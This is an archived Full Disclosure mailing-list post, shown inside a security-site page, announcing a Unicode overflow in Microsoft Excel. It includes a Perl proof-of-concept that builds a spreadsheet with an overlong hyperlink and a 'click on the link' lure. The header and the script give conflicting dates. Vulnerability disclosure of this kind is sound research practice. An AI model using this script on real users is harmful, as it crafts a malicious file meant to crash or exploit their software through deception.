Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:
edgeos network security services platform







Full Disclosure: ***ULTRALAME*** Microsoft Excel Unicode Overflow ***ULTRALAME***

***ULTRALAME*** Microsoft Excel Unicode Overflow ***ULTRALAME***

From: kcope <kingcope_at_gmx.net>
Date: Sat, 18 Jun 2005 22:50:59 +0200

Microsoft Excel Unicode Overflow

Hello this is kcope,
I found a unicode overflow in excel.
It works in my version of excel, perhaps it is patched or something, I have
SP3. I know this is ultralame. Attached are some screenies.
Here are the warezcodez:

###############################
# excelsexywarez.pl
# excel unicode overflow poc
# by kcope in 2006
# thanks to revoguard and alex
###############################
use Spreadsheet::WriteExcel;

    my $workbook = Spreadsheet::WriteExcel->new("FUCK.xls");

    $worksheet = $workbook->add_worksheet();

    $format = $workbook->add_format();
    $format->set_bold();
    $format->set_color('red');
    $format->set_align('center');

    $col = $row = 5;
    $worksheet->write($row, $col, "kcope in da house! Click on the
link!!!", $format);

    $a="AAAAAAAAAAAAAAAAAAAAAA\\" x 500;
    $worksheet->write_url(0, 0, "$a", "LINK");

    
- - kcdarookie

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

keepinitwicked_JPG xver_JPG
Received on Jun 18 2006
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]